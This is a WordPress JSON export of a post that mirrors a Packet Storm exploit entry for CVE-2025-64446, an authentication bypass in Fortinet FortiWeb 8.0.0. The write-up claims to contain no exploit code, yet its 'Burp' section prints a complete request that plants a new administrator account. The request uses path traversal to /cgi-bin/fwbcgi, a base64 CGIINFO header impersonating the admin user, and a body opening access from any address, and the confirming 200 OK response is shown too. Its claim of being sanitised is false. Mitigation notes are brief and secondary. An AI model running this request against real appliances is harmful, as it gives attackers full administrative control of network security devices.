{"id":26857,"date":"2025-11-19T10:40:53","date_gmt":"2025-11-19T10:40:53","guid":{"rendered":"http:\/\/localhost\/?p=26857"},"modified":"2025-11-19T10:40:53","modified_gmt":"2025-11-19T10:40:53","slug":"fortinet-fortiweb-800-authentication-bypass","status":"publish","type":"post","link":"https:\/\/zero.redgem.net\/?p=26857","title":{"rendered":"\ud83d\udcc4 Fortinet FortiWeb 8.0.0 Authentication Bypass_PACKETSTORM:211777"},"content":{"rendered":"<p>{&#8220;lastseen&#8221;:&#8221;2025-11-19T15:53:56&#8243;,&#8221;description&#8221;:&#8221;Analysis&#8230;&#8230;&#8230;&#8230;&#8230;&#8230;&#8230;&#8221;,&#8221;published&#8221;:&#8221;2025-11-19T00:00:00&#8243;,&#8221;modified&#8221;:&#8221;2025-11-19T00:00:00&#8243;,&#8221;type&#8221;:&#8221;packetstorm&#8221;,&#8221;title&#8221;:&#8221;\ud83d\udcc4 Fortinet FortiWeb 8.0.0 Authentication Bypass&#8221;,&#8221;source&#8221;:&#8221;&#8221;,&#8221;references&#8221;:&#8221;&#8221;,&#8221;id&#8221;:&#8221;PACKETSTORM:211777&#8243;,&#8221;bulletinFamily&#8221;:&#8221;exploit&#8221;,&#8221;cwe&#8221;:null,&#8221;cvelist&#8221;:[&#8220;CVE-2025-64446&#8243;],&#8221;sourceData&#8221;:&#8221;# Titles: Fortinet FortiWeb Auth-8.0.0 Bypass CVE-2025-64446\\n    # Author: nu11secur1ty\\n    # Date: 11\/17\/2025\\n    # Vendor: https:\/\/www.fortinet.com\/\\n    # Software: v8.0.0\\n    # Reference: https:\/\/nvd.nist.gov\/vuln\/detail\/CVE-2025-64446\\n    \\n    ## Description:\\n    ## Overview\\n    This document provides a **research\u2011grade analysis** of CVE\u20112025\u201164446, an\\n    authentication bypass vulnerability discovered in Fortinet FortiWeb\\n    appliances.\\n    It is intended *only* for academic, defensive security testing in\\n    controlled lab environments.\\n    \\n    &#8211; No exploit code is included in this document.\\n    \\n    &#8212;\\n    \\n    ## Vulnerability Summary\\n    CVE\u20112025\u201164446 enables an attacker to interact with administrative API\\n    endpoints **without valid authentication**, due to improper trust\\n    validation in a CGI parsing flow.\\n    \\n    A malicious request can trigger the backend logic responsible for\\n    administrative actions, bypassing permission checks.\\n    \\n    Impact includes:\\n    &#8211; Unauthorized access to sensitive endpoints\\n    &#8211; Potential privilege escalation\\n    &#8211; Unauthorized configuration changes\\n    &#8211; Administrative user creation\\n    \\n    &#8212;\\n    \\n    ## Root Cause (High\u2011Level)\\n    During analysis, researchers observed:\\n    &#8211; The endpoint `\/cgi-bin\/fwbcgi` incorrectly trusted data passed through a\\n    crafted context header.\\n    &#8211; Parameter parsing logic allowed insecure inheritance of admin privileges.\\n    &#8211; Failure in validating serialized\/encoded CGI metadata.\\n    \\n    This combination enabled unauthorized execution of administrative actions.\\n    \\n    &#8212;\\n    \\n    ## Observed Response Behavior (Sanitized)\\n    A vulnerable system may return HTTP `200 OK` to unauthorized admin\u2011level\\n    operations.\\n    \\n    Example (sanitized):\\n    &#8220;`\\n    HTTP\/1.1 200 OK\\n    Content-Type: application\/json\\n    \\n    {\\n      \\&#8221;status\\&#8221;: \\&#8221;success\\&#8221;,\\n      \\&#8221;code\\&#8221;: 0,\\n      \\&#8221;message\\&#8221;: \\&#8221;Operation completed\\&#8221;\\n    }\\n    &#8220;`\\n    \\n    &#8212;\\n    \\n    ## Reproduction (Laboratory Only)\\n    This section describes the workflow **without revealing technical\\n    payloads**:\\n    \\n    1. Configure a security testing proxy (e.g., Burp).\\n    2. Intercept traffic destined for FortiWeb.\\n    3. Send a crafted administrative action request.\\n    4. Observe whether the target responds with unauthorized administrative\\n    success.\\n    5. Capture response artifacts for documentation.\\n    \\n    Researchers should generate their own payloads in private lab environments.\\n    \\n    \\n    ## Burp:\\n    &#8211; Request:\\n    &#8220;`\\n    POST \/api\/v2.0\/cmdb\/system\/admin%3f\/..\/..\/..\/..\/..\/cgi-bin\/fwbcgi HTTP\/1.1\\n    Host: 10.10.0.13\\n    Accept-Encoding: gzip, deflate, br\\n    Content-Length: 824\\n    CGIINFO:\\n    eyJ1c2VybmFtZSI6ICJhZG1pbiIsICJwcm9mbmFtZSI6ICJwcm9mX2FkbWluIiwgInZkb20iOiAicm9vdCIsICJsb2dpbm5hbWUiOiAiYWRtaW4ifQ==\\n    Content-Type: application\/json\\n    Connection: keep-alive\\n    \\n    {\\&#8221;data\\&#8221;: {\\&#8221;q_type\\&#8221;: 1, \\&#8221;name\\&#8221;: \\&#8221;1a1222a0\\&#8221;, \\&#8221;access-profile\\&#8221;: \\&#8221;prof_admin\\&#8221;,\\n    \\&#8221;access-profile_val\\&#8221;: \\&#8221;0\\&#8221;, \\&#8221;trusthostv4\\&#8221;: \\&#8221;0.0.0.0\/0\\&#8221;, \\&#8221;trusthostv6\\&#8221;:\\n    \\&#8221;::\/0\\&#8221;, \\&#8221;last-name\\&#8221;: \\&#8221;\\&#8221;, \\&#8221;first-name\\&#8221;: \\&#8221;\\&#8221;, \\&#8221;email-address\\&#8221;: \\&#8221;\\&#8221;,\\n    \\&#8221;phone-number\\&#8221;: \\&#8221;\\&#8221;, \\&#8221;mobile-number\\&#8221;: \\&#8221;\\&#8221;, \\&#8221;hidden\\&#8221;: 0, \\&#8221;comments\\&#8221;: \\&#8221;\\&#8221;,\\n    \\&#8221;sz_dashboard\\&#8221;: -1, \\&#8221;type\\&#8221;: \\&#8221;local-user\\&#8221;, \\&#8221;type_val\\&#8221;: \\&#8221;0\\&#8221;,\\n    \\&#8221;admin-usergrp_val\\&#8221;: \\&#8221;0\\&#8221;, \\&#8221;wildcard_val\\&#8221;: \\&#8221;0\\&#8221;, \\&#8221;accprofile-override_val\\&#8221;:\\n    \\&#8221;0\\&#8221;, \\&#8221;sshkey\\&#8221;: \\&#8221;\\&#8221;, \\&#8221;passwd-set-time\\&#8221;: 0, \\&#8221;history-password-pos\\&#8221;: 0,\\n    \\&#8221;history-password0\\&#8221;: \\&#8221;\\&#8221;, \\&#8221;history-password1\\&#8221;: \\&#8221;\\&#8221;, \\&#8221;history-password2\\&#8221;: \\&#8221;\\&#8221;,\\n    \\&#8221;history-password3\\&#8221;: \\&#8221;\\&#8221;, \\&#8221;history-password4\\&#8221;: \\&#8221;\\&#8221;, \\&#8221;history-password5\\&#8221;: \\&#8221;\\&#8221;,\\n    \\&#8221;history-password6\\&#8221;: \\&#8221;\\&#8221;, \\&#8221;history-password7\\&#8221;: \\&#8221;\\&#8221;, \\&#8221;history-password8\\&#8221;: \\&#8221;\\&#8221;,\\n    \\&#8221;history-password9\\&#8221;: \\&#8221;\\&#8221;, \\&#8221;force-password-change\\&#8221;: \\&#8221;disable\\&#8221;,\\n    \\&#8221;force-password-change_val\\&#8221;: \\&#8221;0\\&#8221;, \\&#8221;password\\&#8221;: \\&#8221;1a1222a0\\&#8221;}}\\n    &#8220;`\\n    &#8211; Response:\\n    &#8220;`\\n    HTTP\/1.1 200 OK\\n    Date: Mon, 17 Nov 2025 19:44:55 GMT\\n    Cache-Control: no-cache, no-store, must-revalidate\\n    Pragma: no-cache\\n    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload\\n    X-Frame-Options: SAMEORIGIN\\n    X-XSS-Protection: 1; mode=block\\n    Content-Security-Policy: script-src &#8216;self&#8217;; default-src &#8216;self&#8217;; style-src\\n    &#8216;self&#8217; &#8216;unsafe-inline&#8217;; font-src &#8216;self&#8217;; img-src &#8216;self&#8217; data:; connect-src\\n    &#8216;self&#8217;; frame-ancestors &#8216;self&#8217;; object-src &#8216;none&#8217;; base-uri &#8216;self&#8217;;\\n    upgrade-insecure-requests; block-all-mixed-content;\\n    X-Content-Type-Options: nosniff\\n    Keep-Alive: timeout=5, max=100\\n    Connection: Keep-Alive\\n    Content-Type: application\/json\\n    Content-Length: 1204\\n    \\n    { \\&#8221;results\\&#8221;: { \\&#8221;can_view\\&#8221;: 0, \\&#8221;q_ref\\&#8221;: 0, \\&#8221;can_clone\\&#8221;: 1, \\&#8221;q_type\\&#8221;: 1,\\n    \\&#8221;name\\&#8221;: \\&#8221;1a1222a0\\&#8221;, \\&#8221;access-profile\\&#8221;: \\&#8221;prof_admin\\&#8221;, \\&#8221;access-profile_val\\&#8221;:\\n    \\&#8221;1008\\&#8221;, \\&#8221;trusthostv4\\&#8221;: \\&#8221;0.0.0.0\\\\\/0 \\&#8221;, \\&#8221;trusthostv6\\&#8221;: \\&#8221;::\\\\\/0 \\&#8221;, \\&#8221;last-name\\&#8221;:\\n    \\&#8221;\\&#8221;, \\&#8221;first-name\\&#8221;: \\&#8221;\\&#8221;, \\&#8221;email-address\\&#8221;: \\&#8221;\\&#8221;, \\&#8221;phone-number\\&#8221;: \\&#8221;\\&#8221;,\\n    \\&#8221;mobile-number\\&#8221;: \\&#8221;\\&#8221;, \\&#8221;hidden\\&#8221;: 0, \\&#8221;domains\\&#8221;: \\&#8221;root \\&#8221;,\\n    \\&#8221;gui-global-menu-favorites\\&#8221;: \\&#8221;\\&#8221;, \\&#8221;gui-vdom-menu-favorites\\&#8221;: \\&#8221;\\&#8221;,\\n    \\&#8221;sz_dashboard\\&#8221;: 8, \\&#8221;sz_gui-dashboard\\&#8221;: 7, \\&#8221;type\\&#8221;: \\&#8221;local-user\\&#8221;, \\&#8221;type_val\\&#8221;:\\n    \\&#8221;0\\&#8221;, \\&#8221;admin-usergrp\\&#8221;: \\&#8221;\\&#8221;, \\&#8221;admin-usergrp_val\\&#8221;: \\&#8221;0\\&#8221;, \\&#8221;password\\&#8221;: \\&#8221;ENC XXXX\\&#8221;,\\n    \\&#8221;wildcard\\&#8221;: \\&#8221;disable\\&#8221;, \\&#8221;wildcard_val\\&#8221;: \\&#8221;0\\&#8221;, \\&#8221;accprofile-override\\&#8221;:\\n    \\&#8221;disable\\&#8221;, \\&#8221;accprofile-override_val\\&#8221;: \\&#8221;0\\&#8221;, \\&#8221;fortiai\\&#8221;: \\&#8221;disable\\&#8221;,\\n    \\&#8221;fortiai_val\\&#8221;: \\&#8221;0\\&#8221;, \\&#8221;sshkey\\&#8221;: \\&#8221;\\&#8221;, \\&#8221;passwd-set-time\\&#8221;: 1763408695,\\n    \\&#8221;history-password-pos\\&#8221;: 1, \\&#8221;history-password0\\&#8221;: \\&#8221;ENC XXXX\\&#8221;,\\n    \\&#8221;history-password1\\&#8221;: \\&#8221;ENC XXXX\\&#8221;, \\&#8221;history-password2\\&#8221;: \\&#8221;ENC XXXX\\&#8221;,\\n    \\&#8221;history-password3\\&#8221;: \\&#8221;ENC XXXX\\&#8221;, \\&#8221;history-password4\\&#8221;: \\&#8221;ENC XXXX\\&#8221;,\\n    \\&#8221;history-password5\\&#8221;: \\&#8221;ENC XXXX\\&#8221;, \\&#8221;history-password6\\&#8221;: \\&#8221;ENC XXXX\\&#8221;,\\n    \\&#8221;history-password7\\&#8221;: \\&#8221;ENC XXXX\\&#8221;, \\&#8221;history-password8\\&#8221;: \\&#8221;ENC XXXX\\&#8221;,\\n    \\&#8221;history-password9\\&#8221;: \\&#8221;ENC XXXX\\&#8221;, \\&#8221;force-password-change\\&#8221;: \\&#8221;disable\\&#8221;,\\n    \\&#8221;force-password-change_val\\&#8221;: \\&#8221;0\\&#8221;, \\&#8221;feature-info-ver\\&#8221;: \\&#8221;\\&#8221; } }\\n    &#8220;`\\n    &#8212;\\n    \\n    ## Mitigation \\u0026 Recommendations\\n    Likely mitigations include:\\n    &#8211; Apply official vendor patches immediately.\\n    &#8211; Disable exposed management interfaces from public networks.\\n    &#8211; Enforce strict role\u2011based access controls.\\n    &#8211; Implement WAF rules to block malformed CGI context headers.\\n    &#8211; Monitor logs for suspicious admin actions.\\n    \\n    &#8212;\\n    \\n    ## Ethical Notice\\n    This documentation is for **defensive research only**.\\n    Please don&#8217;t test systems you do not own or have explicit permission to\\n    assess.\\n    \\n    \\n    \\n    # Reproduce:\\n    [href](https:\/\/www.patreon.com\/posts\/cve-2025-64446-8-143791801)\\n    \\n    # Demo:\\n    [href](https:\/\/www.patreon.com\/posts\/cve-2025-64446-8-143791801)\\n    \\n    # Time spent:\\n    03:00:00\\n    \\n    \\n    &#8211;\\n    System Administrator &#8211; Infrastructure Engineer\\n    Penetration Testing Engineer\\n    Exploit developer at https:\/\/packetstormsecurity.com\/\\n    https:\/\/cve.mitre.org\/index.html\\n    https:\/\/cxsecurity.com\/ and https:\/\/www.exploit-db.com\/\\n    home page: https:\/\/www.asc3t1c-nu11secur1ty.com\/\\n    hiPEnIMR0v7QCo\/+SEH9gBclAAYWGnPoBIQ75sCj60E=\\n    nu11secur1ty \\u003chttps:\/\/www.asc3t1c-nu11secur1ty.com\/\\u003e&#8221;,&#8221;sourceHref&#8221;:&#8221;https:\/\/packetstorm.news\/download\/211777&#8243;,&#8221;cvss&#8221;:{&#8220;score&#8221;:9.8,&#8221;severity&#8221;:&#8221;CRITICAL&#8221;,&#8221;vector&#8221;:&#8221;CVSS:3.1\/AV:N\/AC:L\/PR:N\/UI:N\/S:U\/C:H\/I:H\/A:H&#8221;,&#8221;version&#8221;:&#8221;3.1&#8243;},&#8221;cvss2&#8243;:{},&#8221;cvss3&#8243;:{&#8220;version&#8221;:&#8221;&#8221;,&#8221;vectorString&#8221;:&#8221;&#8221;,&#8221;baseScore&#8221;:0,&#8221;baseSeverity&#8221;:&#8221;&#8221;,&#8221;attackVector&#8221;:&#8221;&#8221;,&#8221;attackComplexity&#8221;:&#8221;&#8221;,&#8221;privilegesRequired&#8221;:&#8221;&#8221;,&#8221;userInteraction&#8221;:&#8221;&#8221;,&#8221;scope&#8221;:&#8221;&#8221;,&#8221;confidentialityImpact&#8221;:&#8221;&#8221;,&#8221;integrityImpact&#8221;:&#8221;&#8221;,&#8221;availabilityImpact&#8221;:&#8221;&#8221;,&#8221;cvssV3&#8243;:{&#8220;version&#8221;:&#8221;&#8221;,&#8221;vectorString&#8221;:&#8221;&#8221;,&#8221;baseScore&#8221;:0,&#8221;baseSeverity&#8221;:&#8221;&#8221;,&#8221;attackVector&#8221;:&#8221;&#8221;,&#8221;attackComplexity&#8221;:&#8221;&#8221;,&#8221;privilegesRequired&#8221;:&#8221;&#8221;,&#8221;userInteraction&#8221;:&#8221;&#8221;,&#8221;scope&#8221;:&#8221;&#8221;,&#8221;confidentialityImpact&#8221;:&#8221;&#8221;,&#8221;integrityImpact&#8221;:&#8221;&#8221;,&#8221;availabilityImpact&#8221;:&#8221;&#8221;}},&#8221;href&#8221;:&#8221;https:\/\/packetstorm.news\/files\/id\/211777\/&#8221;,&#8221;category_name&#8221;:&#8221;Exploit&#8221;,&#8221;post_link&#8221;:&#8221;&#8221;,&#8221;product&#8221;:&#8221;&#8221;,&#8221;version&#8221;:&#8221;&#8221;,&#8221;vendor&#8221;:&#8221;&#8221;,&#8221;ai_description&#8221;:&#8221;&#8221;,&#8221;ai_severity&#8221;:&#8221;&#8221;,&#8221;ai_vendor&#8221;:&#8221;&#8221;,&#8221;ai_product&#8221;:&#8221;&#8221;,&#8221;ai_version&#8221;:&#8221;&#8221;,&#8221;ai_score&#8221;:0}<\/p>\n","protected":false},"excerpt":{"rendered":"<p>{&#8220;lastseen&#8221;:&#8221;2025-11-19T15:53:56&#8243;,&#8221;description&#8221;:&#8221;Analysis&#8230;&#8230;&#8230;&#8230;&#8230;&#8230;&#8230;&#8221;,&#8221;published&#8221;:&#8221;2025-11-19T00:00:00&#8243;,&#8221;modified&#8221;:&#8221;2025-11-19T00:00:00&#8243;,&#8221;type&#8221;:&#8221;packetstorm&#8221;,&#8221;title&#8221;:&#8221;\ud83d\udcc4 Fortinet FortiWeb 8.0.0 Authentication Bypass&#8221;,&#8221;source&#8221;:&#8221;&#8221;,&#8221;references&#8221;:&#8221;&#8221;,&#8221;id&#8221;:&#8221;PACKETSTORM:211777&#8243;,&#8221;bulletinFamily&#8221;:&#8221;exploit&#8221;,&#8221;cwe&#8221;:null,&#8221;cvelist&#8221;:[&#8220;CVE-2025-64446&#8243;],&#8221;sourceData&#8221;:&#8221;# Titles: Fortinet FortiWeb Auth-8.0.0 Bypass CVE-2025-64446\\n # Author: nu11secur1ty\\n # Date: 11\/17\/2025\\n # Vendor: https:\/\/www.fortinet.com\/\\n # Software: v8.0.0\\n #&#8230;<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[9,6,8,35,12,13,53,7,11,5],"class_list":["post-26857","post","type-post","status-publish","format-standard","hentry","category-category_exploit","tag-critical","tag-cve","tag-cvss","tag-cvss-98","tag-exploit","tag-news","tag-packetstorm","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v27.5 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>\ud83d\udcc4 Fortinet FortiWeb 8.0.0 Authentication Bypass_PACKETSTORM:211777 - zero redgem<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/zero.redgem.net\/?p=26857\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"\ud83d\udcc4 Fortinet FortiWeb 8.0.0 Authentication Bypass_PACKETSTORM:211777 - zero redgem\" \/>\n<meta property=\"og:description\" content=\"{&#8220;lastseen&#8221;:&#8221;2025-11-19T15:53:56&#8243;,&#8221;description&#8221;:&#8221;Analysis&#8230;&#8230;&#8230;&#8230;&#8230;&#8230;&#8230;&#8221;,&#8221;published&#8221;:&#8221;2025-11-19T00:00:00&#8243;,&#8221;modified&#8221;:&#8221;2025-11-19T00:00:00&#8243;,&#8221;type&#8221;:&#8221;packetstorm&#8221;,&#8221;title&#8221;:&#8221;\ud83d\udcc4 Fortinet FortiWeb 8.0.0 Authentication Bypass&#8221;,&#8221;source&#8221;:&#8221;&#8221;,&#8221;references&#8221;:&#8221;&#8221;,&#8221;id&#8221;:&#8221;PACKETSTORM:211777&#8243;,&#8221;bulletinFamily&#8221;:&#8221;exploit&#8221;,&#8221;cwe&#8221;:null,&#8221;cvelist&#8221;:[&#8220;CVE-2025-64446&#8243;],&#8221;sourceData&#8221;:&#8221;# Titles: Fortinet FortiWeb Auth-8.0.0 Bypass CVE-2025-64446n # Author: nu11secur1tyn # Date: 11\/17\/2025n # Vendor: https:\/\/www.fortinet.com\/n # Software: v8.0.0n #...\" \/>\n<meta property=\"og:url\" content=\"https:\/\/zero.redgem.net\/?p=26857\" \/>\n<meta property=\"og:site_name\" content=\"zero redgem\" \/>\n<meta property=\"article:published_time\" content=\"2025-11-19T10:40:53+00:00\" \/>\n<meta name=\"author\" content=\"invoker\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"invoker\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"5 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=26857#article\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=26857\"},\"author\":{\"name\":\"invoker\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\"},\"headline\":\"\ud83d\udcc4 Fortinet FortiWeb 8.0.0 Authentication Bypass_PACKETSTORM:211777\",\"datePublished\":\"2025-11-19T10:40:53+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=26857\"},\"wordCount\":959,\"commentCount\":0,\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"keywords\":[\"CRITICAL\",\"CVE\",\"CVSS\",\"CVSS-9.8\",\"exploit\",\"news\",\"packetstorm\",\"Security\",\"tapic\",\"Vulnerability\"],\"articleSection\":[\"category_exploit\"],\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"CommentAction\",\"name\":\"Comment\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=26857#respond\"]}]},{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=26857\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?p=26857\",\"name\":\"\ud83d\udcc4 Fortinet FortiWeb 8.0.0 Authentication Bypass_PACKETSTORM:211777 - zero redgem\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\"},\"datePublished\":\"2025-11-19T10:40:53+00:00\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=26857#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=26857\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=26857#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\\\/\\\/zero.redgem.net\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"\ud83d\udcc4 Fortinet FortiWeb 8.0.0 Authentication Bypass_PACKETSTORM:211777\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"name\":\"zero redgem\",\"description\":\"\",\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/zero.redgem.net\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"},{\"@type\":\"Organization\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\",\"name\":\"zero redgem\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\",\"url\":\"\",\"contentUrl\":\"\",\"width\":191,\"height\":188,\"caption\":\"zero redgem\"},\"image\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\"}},{\"@type\":\"Person\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\",\"name\":\"invoker\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"url\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"contentUrl\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"caption\":\"invoker\"},\"sameAs\":[\"https:\\\/\\\/zero.redgem.net\"],\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?author=1\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"\ud83d\udcc4 Fortinet FortiWeb 8.0.0 Authentication Bypass_PACKETSTORM:211777 - zero redgem","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/zero.redgem.net\/?p=26857","og_locale":"en_US","og_type":"article","og_title":"\ud83d\udcc4 Fortinet FortiWeb 8.0.0 Authentication Bypass_PACKETSTORM:211777 - zero redgem","og_description":"{&#8220;lastseen&#8221;:&#8221;2025-11-19T15:53:56&#8243;,&#8221;description&#8221;:&#8221;Analysis&#8230;&#8230;&#8230;&#8230;&#8230;&#8230;&#8230;&#8221;,&#8221;published&#8221;:&#8221;2025-11-19T00:00:00&#8243;,&#8221;modified&#8221;:&#8221;2025-11-19T00:00:00&#8243;,&#8221;type&#8221;:&#8221;packetstorm&#8221;,&#8221;title&#8221;:&#8221;\ud83d\udcc4 Fortinet FortiWeb 8.0.0 Authentication Bypass&#8221;,&#8221;source&#8221;:&#8221;&#8221;,&#8221;references&#8221;:&#8221;&#8221;,&#8221;id&#8221;:&#8221;PACKETSTORM:211777&#8243;,&#8221;bulletinFamily&#8221;:&#8221;exploit&#8221;,&#8221;cwe&#8221;:null,&#8221;cvelist&#8221;:[&#8220;CVE-2025-64446&#8243;],&#8221;sourceData&#8221;:&#8221;# Titles: Fortinet FortiWeb Auth-8.0.0 Bypass CVE-2025-64446n # Author: nu11secur1tyn # Date: 11\/17\/2025n # Vendor: https:\/\/www.fortinet.com\/n # Software: v8.0.0n #...","og_url":"https:\/\/zero.redgem.net\/?p=26857","og_site_name":"zero redgem","article_published_time":"2025-11-19T10:40:53+00:00","author":"invoker","twitter_card":"summary_large_image","twitter_misc":{"Written by":"invoker","Est. reading time":"5 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/zero.redgem.net\/?p=26857#article","isPartOf":{"@id":"https:\/\/zero.redgem.net\/?p=26857"},"author":{"name":"invoker","@id":"https:\/\/zero.redgem.net\/#\/schema\/person\/fbfeae8dfad117ac08a7621bee1a1dca"},"headline":"\ud83d\udcc4 Fortinet FortiWeb 8.0.0 Authentication Bypass_PACKETSTORM:211777","datePublished":"2025-11-19T10:40:53+00:00","mainEntityOfPage":{"@id":"https:\/\/zero.redgem.net\/?p=26857"},"wordCount":959,"commentCount":0,"publisher":{"@id":"https:\/\/zero.redgem.net\/#organization"},"keywords":["CRITICAL","CVE","CVSS","CVSS-9.8","exploit","news","packetstorm","Security","tapic","Vulnerability"],"articleSection":["category_exploit"],"inLanguage":"en-US","potentialAction":[{"@type":"CommentAction","name":"Comment","target":["https:\/\/zero.redgem.net\/?p=26857#respond"]}]},{"@type":"WebPage","@id":"https:\/\/zero.redgem.net\/?p=26857","url":"https:\/\/zero.redgem.net\/?p=26857","name":"\ud83d\udcc4 Fortinet FortiWeb 8.0.0 Authentication Bypass_PACKETSTORM:211777 - zero redgem","isPartOf":{"@id":"https:\/\/zero.redgem.net\/#website"},"datePublished":"2025-11-19T10:40:53+00:00","breadcrumb":{"@id":"https:\/\/zero.redgem.net\/?p=26857#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/zero.redgem.net\/?p=26857"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/zero.redgem.net\/?p=26857#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/zero.redgem.net\/"},{"@type":"ListItem","position":2,"name":"\ud83d\udcc4 Fortinet FortiWeb 8.0.0 Authentication Bypass_PACKETSTORM:211777"}]},{"@type":"WebSite","@id":"https:\/\/zero.redgem.net\/#website","url":"https:\/\/zero.redgem.net\/","name":"zero redgem","description":"","publisher":{"@id":"https:\/\/zero.redgem.net\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/zero.redgem.net\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-US"},{"@type":"Organization","@id":"https:\/\/zero.redgem.net\/#organization","name":"zero redgem","url":"https:\/\/zero.redgem.net\/","logo":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/zero.redgem.net\/#\/schema\/logo\/image\/","url":"","contentUrl":"","width":191,"height":188,"caption":"zero redgem"},"image":{"@id":"https:\/\/zero.redgem.net\/#\/schema\/logo\/image\/"}},{"@type":"Person","@id":"https:\/\/zero.redgem.net\/#\/schema\/person\/fbfeae8dfad117ac08a7621bee1a1dca","name":"invoker","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","url":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","caption":"invoker"},"sameAs":["https:\/\/zero.redgem.net"],"url":"https:\/\/zero.redgem.net\/?author=1"}]}},"_links":{"self":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts\/26857","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2